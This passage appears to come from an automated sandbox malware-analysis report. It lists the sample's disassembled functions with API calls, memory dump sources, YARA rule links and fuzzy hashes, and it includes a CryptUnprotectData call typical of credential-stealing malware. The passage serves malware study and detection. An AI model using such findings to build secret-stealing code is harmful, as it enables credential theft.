                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004F3A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 86da4b39d89ff361b24df28072b66f012ef961e02a13ede49cca1bbbfcc408a4
                                        • Instruction ID: f41f6f2e68bc34de2828acb90de0a2d3175597c646cef0fbf72ff781fdb68974
                                        • Opcode Fuzzy Hash: 86da4b39d89ff361b24df28072b66f012ef961e02a13ede49cca1bbbfcc408a4
                                        • Instruction Fuzzy Hash: FE41E770A00A1C9FDB24DF59CC95FABB7B5AB48702F4081C9E608E7290D7B56E85CF54
                                        Function 004EA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004EA2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004EA2F3
                                        • LocalFree.KERNEL32(?), ref: 004EA323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: 8dc24d19efc8eeb4ee48031f25422cf443cce6c992cc1374aaa2fc949fd896cd
                                        • Instruction ID: 2d10a6b17dd4b4081405b82668f43b46f09698038fa47e22405855a464913db8
                                        • Opcode Fuzzy Hash: 8dc24d19efc8eeb4ee48031f25422cf443cce6c992cc1374aaa2fc949fd896cd
                                        • Instruction Fuzzy Hash: 9011E8B8A00209DFCB04DF94D888EAEB7B5FB88300F108559ED15A7390D734AE50CB61
                                        Function 0092F8BA Relevance: 4.1, Strings: 2, Instructions: 1580COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 5,w=${7W~
                                        • API String ID: 0-1447155224
                                        • Opcode ID: 3388916720b240f307ab5601464185f3094b5606a506889c75520527b04671fa
                                        • Instruction ID: c35c27307423237eab8a915b24a5450096830597114760e63a08cd8f86489a41
                                        • Opcode Fuzzy Hash: 3388916720b240f307ab5601464185f3094b5606a506889c75520527b04671fa
                                        • Instruction Fuzzy Hash: 33B2F5F3A0C2009FE304AE29EC8567ABBE9EF94720F1A493DE6C5C7744E63558058797
                                        Function 00554BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?$__ZN
                                        • API String ID: 0-1427190319
                                        • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction ID: d8428892eab0b2176edb2e0cabeb586f65d546e1a2cfa388d8fcc7b9decb42a5
                                        • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction Fuzzy Hash: D9722372908B519BD714CE24C8B066ABFE2BFC5312F598A1EFCD55B291E3709C49CB42
                                        Function 00535DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: xn--
                                        • API String ID: 0-2826155999
                                        • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction ID: dfe52bc85d79b5a436cb2d24f18e11ca9a1e19e2e767fe08c70dd3dd7c792529
                                        • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction Fuzzy Hash: 6EA225B2C042689AEF29CB54C8A53EDBFB1FF45300F1882AED4567B281D7355E85CB61
                                        Function 00534DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction ID: b75f08076ae197f0fc79a1d7f7cc3a0294179f44d4e279f61f6384e1cdfbd40f
                                        • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction Fuzzy Hash: C2E1BF316083419FC725CE28C8917AEBBE6FFC9300F59492DE5D99B391E731A855CB82
                                        Function 00534868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction ID: 76bb34655fcbca2f4e097b47110b00259db26d65b6740f7595c186c5c403cf3e
                                        • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction Fuzzy Hash: D1E1A371A083059FDB24CE18C8917AEFBE6FFC5310F15892DE9999B251DB30AC458F46
                                        Function 0054E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: UNC\
                                        • API String ID: 0-505053535
                                        • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction ID: c1b28909a26234456443a9f564c8e4bdcdbc38d9d6cb43c8d466212d453ceaf8
                                        • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction Fuzzy Hash: 00E14B71D042658EEF21CF18C8867FEBFE2BB8531CF198169C4A46B292D7758D46CB90
                                        Function 0081E5FC Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: t9;I
                                        • API String ID: 0-3708887236
                                        • Opcode ID: 8c03838001a587efe1f2912a1828fd81fcc6961f32ba2dfc001e95dd28121996
                                        • Instruction ID: ebb200def2e2c4532689f60700194c54dce41c1efc454bf07feecba10beab087
                                        • Opcode Fuzzy Hash: 8c03838001a587efe1f2912a1828fd81fcc6961f32ba2dfc001e95dd28121996
                                        • Instruction Fuzzy Hash: F0514CF7E082145FF340AA39EC4472BBAE6EBD4350F1B853CDAC8D7744E93599058692
                                        Function 008631FB Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: I!k~
                                        • API String ID: 0-3479374379
                                        • Opcode ID: dbb8eaea16ace64d5d13c5d486c067f777750ed8681329617986699a63e92470
                                        • Instruction ID: a890fce9e2d39b7404f59cc29bc3664946c4b0f89c751b399f92c77df2f9f4ba
                                        • Opcode Fuzzy Hash: dbb8eaea16ace64d5d13c5d486c067f777750ed8681329617986699a63e92470
                                        • Instruction Fuzzy Hash: 8D5147F3A182049FE3086E3DDC95736BBD6EB90710F2A4A3CDAC587384ED3A58448746
                                        Function 0050E544 Relevance: .8, Instructions: 823COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction ID: 049e4673c3048c462e4dfa9920f7ec215e49db6737fc39a51cbca608b0494467
                                        • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction Fuzzy Hash: B082F175900F448FD765CF29C881B96BBF1BF8A300F548A2ED9EA8BA51DB30B545CB50
                                        Function 00528E78 Relevance: .6, Instructions: 649COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
